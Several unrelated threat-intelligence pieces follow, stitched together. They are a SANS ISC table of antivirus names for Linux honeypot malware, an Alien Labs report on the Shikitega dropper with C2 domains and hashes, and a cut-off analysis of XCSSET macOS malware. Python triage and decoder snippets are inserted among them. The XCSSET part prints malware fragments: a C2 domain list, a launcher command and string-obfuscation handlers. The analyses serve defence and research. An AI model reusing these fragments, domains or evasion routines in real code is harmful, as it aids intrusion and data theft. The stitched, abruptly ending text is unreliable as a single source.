| Generic.Bash.MiraiA.9FE00F4A | 7 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.F71C9D36 | 7 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiB.43209CEF | 7 | ‘downloader.miraib/bash’ |
| Generic.Bash.MiraiA.C840B7CF | 6 | ‘downloader.bash/miraia’, ‘downloader.bash/linux’ |
| Generic.Bash.MiraiA.B7AF6546 | 6 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.76F02707 | 6 | ‘downloader.bash/miraia’ |
| Trojan.GenericKD.61105047 | 6 | ‘trojan.linux/shell’ |
| Trojan.Linux.Agent.IOS | 5 | ‘trojan.linux/mirai’ |
| Backdoor.Perl.Shellbot.F | 5 | ‘trojan.perl/shellbot’ |
| Generic.Bash.MiraiA.F31D7395 | 5 | ‘downloader.bash/miraia’ |
| Trojan.GenericKD.50646874 | 5 | ‘trojan.’ |
| Trojan.Linux.GenericKD.49342126 | 5 | ‘trojan.linux/mirai’ |
| Generic.Bash.MiraiA.53DA044C | 5 | ‘downloader.bash/miraia’, ‘downloader.bash/linux’ |
| Generic.Bash.MiraiA.CDE0B287 | 5 | ‘downloader.bash/linux’ |
| Generic.Bash.MiraiA.5A5455F1 | 5 | ‘downloader.bash/miraia’ |
| Trojan.GenericKD.46067161 | 4 | ‘trojan.linux’ |
| Trojan.GenericKD.46077164 | 4 | ‘trojan.linux/shell’ |
| Trojan.GenericKD.48821331 | 4 | ‘trojan.’ |
| Trojan.GenericKD.39722073 | 4 | ‘trojan.linux’ |
| Application.Linux.Generic.9905 | 4 | ‘trojan.linux/gafgyt’ |
| Generic.Bash.MiraiA.2B19920F | 4 | ‘downloader.miraia/bash’ |
| Generic.Bash.MiraiA.AB3356B6 | 4 | ‘downloader.linux/bash’ |
| Generic.Bash.MiraiA.90D485C3 | 4 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.1BB22156 | 4 | ‘downloader.bash/miraia’, ‘downloader.bash/linux’ |
| Generic.Bash.MiraiA.77A820C1 | 4 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.9F225672 | 4 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.C00C7246 | 4 | ‘downloader.bash/linux’ |
| Generic.Bash.MiraiA.261F2800 | 4 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.91B96D6D | 4 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.8525AE6B | 4 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiB.81B3B899 | 4 | ‘trojan.miraib/bash’ |
| Generic.Bash.MiraiA.42A992E0 | 4 | ‘downloader.bash/miraia’, ‘downloader.linux/bash’ |
| Linux.Trojan.Agent.FRYE0V | 3 | ‘trojan.mirai/linux’ |
| Generic.Bash.MiraiB.EB588E65 | 3 | ‘downloader.miraib/bash’ |
| Generic.Bash.MiraiA.F4E0D44D | 3 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.9FAC84B8 | 3 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.42844671 | 3 | ‘downloader.bash/miraia’ |
| Trojan.GenericKD.50084126 | 3 | ‘trojan.linux/shell’ |
| Linux.Trojan.Mirai.E | 3 | ‘trojan.mirai/linux’ |
| Trojan.Linux.Mirai.GDC | 3 | ‘trojan.linux/mirai’ |
| Generic.Bash.MiraiA.49306ADF | 3 | ‘downloader.linux/bash’ |
| Generic.Bash.MiraiA.F9E49AE2 | 3 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.87330CC0 | 3 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.A6961F86 | 3 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.29E60E32 | 3 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.1DCA368B | 3 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.32EA1F82 | 3 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.370A6145 | 3 | ‘downloader.bash/linux’ |
| Generic.Bash.MiraiA.88F9FED5 | 3 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.A6CEE47A | 3 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.6215B474 | 3 | ‘downloader.miraia/bash’ |
| Generic.Bash.MiraiA.BF170979 | 3 | ‘downloader.linux/bash’, ‘downloader.bash/linux’ |
| Linux.Application.CoinMiner.AH | 3 | ‘trojan.linux/sshbru’ |
| Generic.Bash.MiraiA.8991856A | 3 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.D4BA1004 | 3 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.EE96A6CC | 3 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiB.C122DEF0 | 2 | ‘trojan.miraib/bash’ |
| Linux.Trojan.Agent.21WIPQ | 2 | ‘trojan.linux/mirai’ |
| Script.Trojan.Agent.D34HUR | 2 | ‘downloader.linux’ |
| Backdoor.Perl.Shellbot.B | 2 | ‘trojan.perl/shellbot’ |
| Generic.Bash.MiraiA.19B73922 | 2 | ‘downloader.miraia/bash’ |
| Generic.Bash.MiraiA.F9CC4608 | 2 | ‘downloader.linux/bash’, ‘downloader.bash/linux’ |
| Generic.Bash.MiraiA.E2FF41E4 | 2 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.F384FF05 | 2 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.03BF947A | 2 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.D2936D49 | 2 | ‘downloader.bash/miraia’ |
| Script.Trojan.Agent.XQDCBP | 2 | ‘downloader.linux/shell’ |
| Trojan.Linux.GenericKD.49319781 | 2 | ‘trojan.linux/mirai’ |
| Generic.Bash.MiraiA.AFC860A3 | 2 | ‘downloader.bash/miraia’ |
| Linux.Trojan.Agent.71ZXJT | 2 | ‘trojan.linux/mirai’ |
| Generic.Bash.MiraiA.0A4B5647 | 2 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.3085EB19 | 2 | ‘downloader.bash/linux’ |
| Generic.Bash.MiraiA.C8C8B46F | 2 | ‘downloader.linux/bash’ |
| Generic.Bash.MiraiA.E0206CAA | 2 | ‘downloader.miraia/bash’ |
| Generic.Bash.MiraiA.AFD545E8 | 2 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.9DFBA98D | 2 | ‘downloader.bash/linux’ |
| Generic.Bash.MiraiA.77508253 | 2 | ‘downloader.bash/miraia’ |
| Trojan.Linux.Generic.266531 | 2 | ‘trojan.linux/shell’ |
| Generic.Bash.MiraiA.999DC364 | 2 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiB.C388CEE8 | 1 | ‘downloader.miraib/bash’ |
| Trojan.Linux.Generic.258109 | 1 | ‘trojan.linux/mirai’ |
| Generic.Bash.MiraiB.9F77C950 | 1 | ‘downloader.miraib/bash’ |
| Gen:Variant.Trojan.Linux.Mirai.8 | 1 | ‘trojan.mirai/linux’ |
| Trojan.GenericKD.48821326 | 1 | ‘trojan.linux’ |
| Trojan.Linux.Generic.207109 | 1 | ‘trojan.linux/shell’ |
| Generic.Bash.MiraiA.F7E66D30 | 1 | ‘downloader.bash/miraia’ |
| Linux.Trojan.Agent.0JQTA6 | 1 | ‘trojan.linux/mirai’ |
| Generic.Bash.MiraiA.6AB1054A | 1 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.E4FF83F6 | 1 | ‘downloader.bash/miraia’ |
| Linux.Trojan.Mirai.J | 1 | ‘trojan.mirai/linux’ |
| Generic.Bash.MiraiA.06015B18 | 1 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.716695BA | 1 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.CA694A08 | 1 | ‘downloader.bash/linux’ |
| Generic.Bash.MiraiA.7D12497D | 1 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.24330190 | 1 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.7AD1CA92 | 1 | ‘downloader.bash/linux’ |
| Generic.Bash.MiraiA.9A967DD3 | 1 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.A3F75002 | 1 | ‘downloader.linux/bash’ |
| Generic.Bash.MiraiB.83D16FFF | 1 | ‘downloader.bash/miraib’ |
| Generic.Bash.MiraiA.7176EFCA | 1 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.BBDDAFB3 | 1 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.9C2BFED6 | 1 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiA.27A5FB7E | 1 | ‘downloader.bash/miraia’ |
| Generic.Bash.MiraiB.A8550CC8 | 1 | ‘downloader.bash/miraib’ |
| Script.Trojan.Agent.SSSDZG | 1 | ‘trojan.shell/smlbr’ |

| Microsoft Result | Count | VirusTotal Suggested Threats |
| --- | --- | --- |
| TrojanDownloader:Linux/Morila!MTB | 118 | ‘trojan.linux/shell’, ‘downloader.bash/linux’, ‘downloader.bash/miraia’, ‘downloader.linux/bash’, ‘downloader.linux/shell’ |
| Backdoor:Linux/IRCbot.YA!MTB | 95 | ‘trojan.shell/linux’, ‘trojan.linux/shell’, ‘trojan.ircbot/shell’, ‘trojan.ircbot/linux’, ‘trojan.linux/ircbot’, ‘trojan.shell/ircbot’ |
| Trojan:Linux/Multiverze | 58 | ‘trojan.linux/uselvhs22’, ‘trojan.linux/mirai’, ‘trojan.linux/tygpz’, ‘trojan.mirai/linux’, ‘trojan.linux/multiverze’ |
| TrojanDownloader:Linux/Morila.B!MTB | 57 | ‘downloader.bash/miraia’, ‘downloader.bash/linux’ |
| TrojanDownloader:Linux/ShWg.YB!MTB | 54 | ‘downloader.bash/miraia’, ‘trojan.linux/shell’, ‘downloader.bash/linux’ |
| Trojan:Script/Wacatac.B!ml | 40 | ‘downloader.bash/miraib’, ‘trojan.miraib/bash’, ‘trojan.mirai/linux’, ‘downloader.miraib/bash’ |
| HackTool:Linux/Sshbru!MTB | 26 | ‘trojan.linux/shell’, ‘trojan.linux’, ‘trojan.linux/sshbru’ |
| DoS:Linux/Xorddos.A | 23 | ‘trojan.linux/xorddos’ |
| Trojan:Linux/CoinMiner!rfn | 16 | ‘trojan.linux/shell’ |
| Trojan:Linux/CoinMiner.N!MTB | 9 | ‘miner.linux/camelot’ |
| HackTool:Linux/Sshbru!rfn | 8 | ‘trojan.linux/shell’, ‘trojan.linux/sshbru’, ‘trojan.linux/bruteforce’ |
| Backdoor:Linux/Mirai.BO!MTB | 6 | ‘trojan.linux/mirai’, ‘linux’ |
| Trojan:Win32/Occamy.CAD | 4 | ‘trojan.linux’ |
| Backdoor:HTML/Derflop.A | 4 | ‘trojan.perl/shellbot’ |
| Backdoor:Linux/Gafgyt.A!MTB | 4 | ‘trojan.linux/gafgyt’ |
| Trojan:Unix/Multiverze | 3 | ‘trojan.linux/shell’ |
| Trojan:Linux/Mirai.AB!MTB | 2 | ‘downloader.bash/miraia’ |
| Trojan:Linux/Downldr.AE!MTB | 2 | ‘downloader.bash/miraia’ |
| Backdoor:Linux/Mirai.AN!xp | 1 | ‘trojan.mirai/linux’ |
| Trojan:Linux/ZkarletFlash | 1 | ‘trojan.mirai/linux’ |
| Backdoor:Linux/Mirai.AW!MTB | 1 | ‘trojan.mirai/linux’ |
| TrojanDownloader:Linux/Mirai.C!MTB | 1 | ‘downloader.linux/mirai’ |

Summarized and detailed hash data can be downloaded from here [7]. 

When using tools like VirusTotal it is important to be aware of name changes over time and that vendors have their own naming schemes. Make sure that you’re using the latest available results and using the “Reanalyse File” option within VirusTotal to update analysis information. 

[1] https://www.virustotal.com
[2] https://isc.sans.edu/honeypot.html
[3] https://github.com/jslagrew/cowrieprocessor/blob/main/submit_vtfiles.py
[4] https://en.wikipedia.org/wiki/Mirai_(malware)
[5] https://exceljet.net/formula/xlookup-latest-by-date
[6] https://www.comparitech.com/antivirus/avast-vs-avg/
[7] https://www.dropbox.com/sh/jswjv5mlvku0ep7/AADm5vyoR8Jwil7_BgqXjz7ra?dl=0

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.


Executive summary

AT&T Alien Labs has discovered a new malware targeting endpoints and IoT devices running Linux operating systems. Shikitega is delivered in a multistage infection chain where each module responds to a part of the payload and downloads and executes the next one. An attacker can gain full control of the system, in addition to the cryptocurrency miner that is executed and set to persist.

Key takeaways:

• The malware downloads and executes Metasploit’s “Mettle” meterpreter to maximize its control over infected machines.
• Shikitega exploits system vulnerabilities to gain high privileges, persist and execute a crypto miner.
• The malware uses a polymorphic encoder to make it more difficult for anti-virus engines to detect.
• Shikitega abuses legitimate cloud services to host some of its command and control (C&C) servers.

Figure 1. Shikitega operation process.

Background

With a rise of nearly 650% in malware and ransomware for Linux this year, reaching an all-time high in the first half of 2022, threat actors find servers, endpoints and IoT devices based on Linux operating systems more and more valuable and find new ways to deliver their malicious payloads. New malware like BotenaGo and EnemyBot are examples of how malware writers rapidly incorporate recently discovered vulnerabilities to find new victims and increase their reach.

Shikitega uses a multi-layer infection chain, where the first layer contains only a few hundred bytes and each module is responsible for a specific task, from downloading and executing the Metasploit meterpreter, exploiting Linux vulnerabilities and setting persistence on the infected machine, to downloading and executing a cryptominer.

Analysis

The main dropper of the malware is a very small ELF file: its total size is only around 370 bytes, of which the actual code is around 300 bytes (figure 2).

Figure 2. Malicious ELF file with a total of only 376 bytes.
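A few-hundred-byte ELF with no imports is itself a triage signal, and the structural properties behind it can be checked mechanically. The Python below is an added example (not Alien Labs' code): it parses a little-endian ELF32 header and its program headers and reports the indicators a defender would key on for a shellcode-in-a-wrapper binary: file size under a threshold, no section header table, no PT_DYNAMIC segment (hence no imports), and a PT_LOAD segment mapped read-write-execute. build_minimal_elf32 is a constructed fixture that wraps placeholder zero bytes in a bare header so the check can be exercised offline; it is not the Shikitega dropper, and the 1024-byte threshold is an assumed tuning value.

```python
import struct

# ELF32 little-endian layouts (see elf(5)).
EHDR_FMT = "<16sHHIIIIIHHHHHH"   # e_ident .. e_shstrndx, 52 bytes
PHDR_FMT = "<IIIIIIII"           # p_type .. p_align, 32 bytes
PT_LOAD, PT_DYNAMIC = 1, 2
PF_X, PF_W, PF_R = 1, 2, 4


def triage_elf32(data, tiny_threshold=1024):
    """Return structural indicators for a little-endian ELF32 blob.
    `tiny_threshold` is an assumed cut-off, not a published value."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("only ELFCLASS32 / little-endian is parsed here")
    (_, e_type, e_machine, _, e_entry, e_phoff, e_shoff, _, _,
     e_phentsize, e_phnum, _, e_shnum, _) = struct.unpack_from(EHDR_FMT, data, 0)

    phdrs = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + 32 > len(data):
            break  # truncated program header table: stop, do not crash
        phdrs.append(struct.unpack_from(PHDR_FMT, data, off))

    loads = [p for p in phdrs if p[0] == PT_LOAD]
    rwx = PF_R | PF_W | PF_X
    indicators = {
        "size_bytes": len(data),
        "machine": e_machine,
        "tiny": len(data) < tiny_threshold,
        "no_section_headers": e_shnum == 0 or e_shoff == 0,
        "has_dynamic": any(p[0] == PT_DYNAMIC for p in phdrs),
        "rwx_load_segment": any(p[6] & rwx == rwx for p in loads),
        # p[2] is p_vaddr, p[5] is p_memsz: does the entry point land in a LOAD?
        "entry_in_load_segment": any(p[2] <= e_entry < p[2] + p[5] for p in loads),
    }
    indicators["shellcode_wrapper_like"] = (
        indicators["tiny"] and indicators["no_section_headers"]
        and not indicators["has_dynamic"] and indicators["rwx_load_segment"]
    )
    return indicators


def build_minimal_elf32(code, flags=PF_R | PF_W | PF_X, base=0x08048000):
    """Constructed fixture: a bare ELF32 i386 header plus one PT_LOAD segment
    that maps the whole file and jumps to `code`. `code` is placeholder bytes
    in the test, not a payload."""
    body_off = 52 + 32
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS32, LSB, v1
    ehdr = struct.pack(EHDR_FMT, e_ident,
                       2, 3, 1,            # ET_EXEC, EM_386, EV_CURRENT
                       base + body_off,    # e_entry
                       52, 0, 0,           # e_phoff, e_shoff (none), e_flags
                       52, 32, 1,          # e_ehsize, e_phentsize, e_phnum
                       0, 0, 0)            # e_shentsize, e_shnum, e_shstrndx
    size = body_off + len(code)
    phdr = struct.pack(PHDR_FMT, PT_LOAD, 0, base, base, size, size, flags, 0x1000)
    return ehdr + phdr + code


if __name__ == "__main__":
    sample = build_minimal_elf32(b"\x00" * 16)
    for k, v in triage_elf32(sample).items():
        print(f"{k:24} {v}")
```

The combined verdict is a heuristic: legitimate statically linked tools are rarely this small and normally keep section headers, and a writable-and-executable segment is what a self-decoding stub needs, so the four conditions together are a strong prompt for manual analysis rather than a detection on their own. Run it over files harvested from a honeypot before they go to a sandbox.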

The malware uses the “Shikata Ga Nai” polymorphic XOR additive feedback encoder, one of the most popular encoders in Metasploit. Using the encoder, the malware runs through several decode loops, where each loop decodes the next layer, until the final shellcode payload is decoded and executed. The encoder stub is generated using dynamic instruction substitution and dynamic block ordering, and registers are also selected dynamically. Below we can see how the encoder decrypts the first two loops (figures 3 and 4).

Figure 3. First “Shikata Ga Nai” decryption loop.

Figure 4. Second “Shikata Ga Nai” decryption loop created by the first one.

After several decryption loops, the final payload shellcode is decrypted and executed. As the malware does not use any imports, it uses ‘int 0x80’ to invoke the appropriate syscall directly. Because the main dropper code is very small, the malware downloads and executes additional commands from its command and control server by calling syscall 102 (sys_socketcall) (figure 5).

Figure 5. Calling system functions using interrupts

The C&C will respond with additional shell commands to execute, as seen in the packet capture in figure 6. The first bytes marked in blue are the shell commands that the malware will execute.

Figure 6. Additional commands received from C&C.

The received command downloads additional files from the server; these are not stored on the hard drive but executed from memory only (figure 7).

Figure 7. Executes additional shell code received from C&C.

In other malware versions, it uses the “execve” syscall to run ‘/bin/sh’ with the command received from the C&C (figure 8).

Figure 8. Executing shell commands by using syscall_execve.

The malware downloads and executes ‘Mettle’, a Metasploit meterpreter payload that gives the attacker a wide range of capabilities: webcam control, sniffing, multiple reverse shells (tcp/http, ...), process control, shell command execution and more.

In addition, the malware uses wget to download and execute the next stage dropper.

Next stage dropper

The next downloaded and executed file is another small ELF file (around 1 KB), also encoded with the “Shikata Ga Nai” encoder. The malware decrypts a shell command and executes it by calling syscall_execve with ‘/bin/sh’ and the decrypted command as parameters (figure 9).

Figure 9. Second stage dropper decrypts and executes shell commands.

The executed shell command downloads and executes additional files. To run the next and last stage dropper, it exploits two Linux vulnerabilities to escalate privileges: CVE-2021-4034 and CVE-2021-3493 (figures 10 and 11).

Figure 10. Exploiting Linux vulnerability CVE-2021-3493.

Figure 11. Exploiting CVE-2021-4034 vulnerability.

The malware leverages the exploit to download and execute the final stage, the persistence scripts and the cryptominer payload, with root privileges.

Persistence

To achieve persistence, the malware downloads and executes a total of 5 shell scripts. It persists on the system by setting 4 crontabs: two for the currently logged-in user and two for root. It first checks whether the crontab command exists on the machine; if not, the malware installs it and starts the crontab service.

To make sure only one instance is running, it uses the flock command with the lock file “/var/tmp/vm.lock”.

Figure 12. Adding root crontab to execute the final payload.

Below is the list of scripts downloaded and executed to achieve persistence:

script name     details
unix.sh         Checks whether the “crontab” command exists on the system; if not, installs it and starts the crontab service.
brict.sh        Adds a crontab for the current user to execute the cryptominer.
politrict.sh    Adds a root crontab to execute the cryptominer.
truct.sh        Adds a crontab for the current user to download the cryptominer and its config from the C&C.
restrict.sh     Adds a root crontab to download the cryptominer and its config from the C&C.

Since persistence is provided by the crontabs, the malware then deletes all downloaded files from the system to hide its presence.

Cryptominer payload

The malware downloads and executes XMRig miner, a popular miner for the Monero cryptocurrency. It will also set a crontab to download and execute the crypto miner and config from the C&C as mentioned in the persistence part above.

Figure 13. XMRig miner is downloaded and executed on an infected machine.

Command and control

Shikitega uses cloud services to host some of its command and control (C&C) servers, as shown by OTX in figure 14. Because the malware in some cases contacts the C&C server directly by IP address, without a domain name, it is difficult to provide a complete list of indicators for detection: those addresses are volatile and will be reused for legitimate purposes within a short period of time.

Figure 14. Command and control server hosted on a legitimate cloud hosting service.

Recommended actions

Keep software up to date with security updates.
Install antivirus and/or EDR on all endpoints.
Use a backup system to back up server files.

Conclusion

Threat actors continue to search for new ways to deliver malware that stay under the radar and avoid detection. Shikitega is delivered in a sophisticated way: it uses a polymorphic encoder and delivers its payload gradually, with each step revealing only part of the total payload. In addition, the malware abuses known hosting services to host its command and control servers. Stay safe!

Associated Indicators (IOCs)

The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the OTX Pulse. Please note, the pulse may include other activities related but out of the scope of the report.

TYPE      INDICATOR                                                          DESCRIPTION
DOMAIN    dash[.]cloudflare.ovh                                              Command and control
DOMAIN    main[.]cloudfronts.net                                             Command and control
SHA256    b9db845097bbf1d2e3b2c0a4a7ca93b0dc80a8c9e8dbbc3d09ef77590c13d331   Malware hash
SHA256    0233dcf6417ab33b48e7b54878893800d268b9b6e5ca6ad852693174226e3bed   Malware hash
SHA256    f7f105c0c669771daa6b469de9f99596647759d9dd16d0620be90005992128eb   Malware hash
SHA256    8462d0d14c4186978715ad5fa90cbb679c8ff7995bcefa6f9e11b16e5ad63732   Malware hash
SHA256    d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374   Malware hash
SHA256    fc97a8992fa2fe3fd98afddcd03f2fc8f1502dd679a32d1348a9ed5b208c4765   Malware hash
SHA256    e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d   Malware hash
SHA256    cbdd24ff70a363c1ec89708367e141ea2c141479cc4e3881dcd989eec859135d   Malware hash
SHA256    d5bd2b6b86ce14fbad5442a0211d4cb1d56b6c75f0b3d78ad8b8dd82483ff4f8   Malware hash
SHA256    29aafbfd93c96b37866a89841752f29b55badba386840355b682b1853efafcb8   Malware hash
SHA256    4ed78c4e90ca692f05189b80ce150f6337d237aaa846e0adf7d8097fcebacfe7   Malware hash
SHA256    130888cb6930500cf65fc43522e2836d21529cab9291c8073873ad7a90c1fbc5   Malware hash
SHA256    3ce8dfaedb3e87b2f0ad59e1c47b9b6791b99796d38edc3a72286f4b4e5dc098   Malware hash
SHA256    6b514e9a30cbb4d6691dd0ebdeec73762a488884eb0f67f8594e07d356e3d275   Malware hash
SHA256    7c70716a66db674e56f6e791fb73f6ce62ca1ddd8b8a51c74fc7a4ae6ad1b3ad   Malware hash
SHA256    2b305939d1069c7490b3539e2855ed7538c1a83eb2baca53e50e7ce1b3a165ab   Malware hash CVE-2021-3493
SHA256    4dcae1bddfc3e2cb98eae84e86fb58ec14ea6ef00778ac5974c4ec526d3da31f   Malware hash CVE-2021-4034
SHA256    e8e90f02705ecec9e73e3016b8b8fe915873ed0add87923bf4840831f807a4b4   Malware hash
SHA256    64a31abd82af27487985a0c0f47946295b125e6d128819d1cbd0f6b62a95d6c4   Malware shell script
SHA256    623e7ad399c10f0025fba333a170887d0107bead29b60b07f5e93d26c9124955   Malware shell script
SHA256    59f0b03a9ccf8402e6392e07af29e2cfa1f08c0fc862825408dea6d00e3d91af   Malware shell script
SHA256    9ca4fbfa2018fe334ca8f6519f1305c7fbe795af9eb62e9f58f09e858aab7338   Malware shell script
SHA256    05727581a43c61c5b71d959d0390d31985d7e3530c998194670a8d60e953e464   Malware shell script
SHA256    ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d   Malware hash

Mapped to MITRE ATT&CK

The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:

TA0002: Execution

T1059: Command and Scripting Interpreter
T1569: System Service

T1569.002: Service Execution

TA0003: Persistence

T1543: Create or Modify System Process

TA0005: Defense Evasion

T1027: Obfuscated Files or Information

I recorded a video for yesterday’s diary entry James Webb JPEG With Malware.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

On Wednesday’s stormcast, Johannes talked about a JPEG picture (coming from the James Webb telescope) that malware authors had laced with malware.

Threat actors behind the XCSSET malware have been relatively quiet since last year. However, new activity beginning around April 2022 and increasing through May to August shows that actors have not only adapted to changes in macOS Monterey, but are preparing for the demise of Python, an integral and essential part of their current toolkit.

In this post, we review changes made to the latest versions of XCSSET and reveal some of the context in which these threat actors operate.

XCSSET Changes in 2022

Since XCSSET first appeared, the authors have made consistent use of two primary tools to obfuscate droppers and dropped files: SHC and run-only compiled AppleScripts, respectively.

SHC-compiled shell scripts are opaque to traditional static scanning tools and contain only a few human-readable strings.

Since all SHC-compiled binaries, legitimate or malicious, contain these same strings, signature scanners cannot distinguish between them.

SHA1: 127b66afa20a1c42e653ee4f4b64cf1ee3ed637d

Dynamic execution of this recent SHC-compiled XCSSET dropper (currently with 0 detections on VirusTotal despite having been known for 2 months) also reveals that the malware authors have moved the primary executable from a fake Xcode.app in the initial 2020 versions, to a fake Mail.app in 2021, and now to a fake Notes.app in 2022. These fake apps are invariably dropped in a parent folder created at a random location in the user’s Library folder. When executed, this particular sample writes the fake Notes.app to:

~/Library/Application Scripts/com.apple.CalendarAgent

The updated run-only AppleScripts that XCSSET drops as second-stage payloads use a collection of newly-registered domains:

set domains to {
    "superdocs.ru",
    "melindas.ru",
    "kinksdoc.ru",
    "adobefile.ru",
    "gurumades.ru",
    "appledocs.ru",
    "45.82.153.92",
    "gismolow.com",
    "Cosmodron.com"
}

Changes in the replicator.applescript file, which infects users’ Xcode projects with the XCSSET malware, show that both curl’s --max-time value and the script’s phaseName variable have now been randomized, presumably to hamper static detection or hunting rules.

Xcode infection script from 2021 (Left) and 2022 (Right)

The --max-time option is now set to a random value between 5 and 9, while phaseName is chosen from the following list:

"Copy Bundle Frameworks",
"Compile Binary Libraries",
"Compile Swift Frameworks",
"Binary Frameworks Compiler"

In the previous version of XCSSET, the malware created and dropped files for its own caches and control functions in a folder at ~/Library/Caches/GeoServices/. This has been modified slightly to “GitServices”.

Persistence plists are currently chosen from the following list:

com.apple.airplay.plist

com.apple.spx.plist

com.google.keystore.plist

com.google.chrome.plist

and target a file at one of:

~/Library/Caches/GitServices/CloudServiceWorker

~/Library/Caches/GitServices/AppleWebKit

As previously, XCSSET continues to attempt to evade detection by masquerading as either system software or the almost ubiquitous Google and Chrome browser software.

XCSSET’s Updated Fake Notes.app

As noted, XCSSET makes use of a fake Notes.app to hide the primary executable, a.scpt, itself launched by the run-only compiled AppleScript main.scpt when “Notes” is executed via the dropped LaunchAgent.

The SHC-compiled dropper script defines several random paths to use as parent directories for the fake Notes.app.

osacompile -x -e try do shell script "osascript '/Users/user1/Library/Application Support/com.apple.spotlight/Notes.app/Contents/Resources/Scripts/a.scpt'" end try -o

The a.scpt remains, in essence, the same as earlier versions except that the encoding handler has changed from one previously shared with OSAMiner.

on xe(_str)
    set x to id of _str
    repeat with c in x
        set contents of c to c - (102 - 2)
    end repeat
    return string id x
end xe

on xex(_str)
    set x to id of _str
    repeat with c in x
        set contents of c to c - (102 - 1)
    end repeat
    return string id x
end xex
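For analysts who would rather recover the obfuscated strings outside of AppleScript, here is an added Python port of the two handlers above (this is not code from the SentinelOne post or from the malware). `id of _str` in AppleScript yields the Unicode code points of the string and `string id` converts them back, so `ord`/`chr` reproduce the handlers exactly; the helper that tries both shifts and the sample strings are this example's own additions.

```python
def xe_decode(text):
    """Port of the a.scpt 'xe' handler: every code point minus (102 - 2)."""
    return "".join(chr(ord(c) - (102 - 2)) for c in text)


def xex_decode(text):
    """Port of the 'xex' handler: every code point minus (102 - 1)."""
    return "".join(chr(ord(c) - (102 - 1)) for c in text)


def shift_encode(text, shift):
    """Inverse of the handlers; used here only to construct sample input."""
    return "".join(chr(ord(c) + shift) for c in text)


def decode_candidates(text):
    """Run both handlers over a literal pulled from a dumped script and keep
    the results that are valid, printable ASCII. Both readings can be
    printable (they differ by one per character), so the analyst picks the
    one that makes sense in context."""
    out = {}
    for name, fn in (("xe", xe_decode), ("xex", xex_decode)):
        try:
            plain = fn(text)
        except ValueError:  # code point went negative: not this handler
            continue
        if plain and all(32 <= ord(c) < 127 for c in plain):
            out[name] = plain
    return out


if __name__ == "__main__":
    # Constructed sample: what "osascript" looks like after the xe shift.
    sample = shift_encode("osascript", 102 - 2)
    print(repr(sample), "->", decode_candidates(sample))
```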

Malicious Run-Only AppleScripts

Aside from a.scpt, XCSSET makes use of multiple run-only AppleScripts. Although these scripts are written to disk as compiled and run-only, we were able to capture the scripts in plain text on the wire. In the updated version of XCSSET, these continue to target Telegram and other chat apps heavily in use by Chinese users such as WeChat and Tencent’s 360, along with an expanded list of browsers, including Opera, Brave, Edge and other Chromium-based browsers.

Many of the scripts shown above share the same structure and list of handlers but make minor changes to handle the specifics of each target application.

check_loop()

log(message)

runme()

upload(filePath, fileName)

urlencode(theText)

The contacts.applescript has the role of targeting various chat apps from which to steal and exfiltrate data.

Among other tasks, the payloader.applescript checks for AppleBackLightDisplay, presumably to distinguish between laptops and desktops. This info is part of what is exfiltrated, showing that the threat actors are keen to gather very precise hardware profiling information.

Similarly, the threat actors are interested in exactly how up-to-date the victim is with Apple’s XProtect and MRT malware removal tool, presumably all the better to target them with more effective payloads. The listing.applescript script is used for this purpose.

Also of interest is the use of the public service transfer.sh for exfiltrating data files that are too large for the attacker’s server.

XCSSET Changes for Monterey and Python

One of the more interesting things we noted in recent samples of XCSSET is the developer’s awareness of OS versions and the clear intent that the authors are here for the long run.

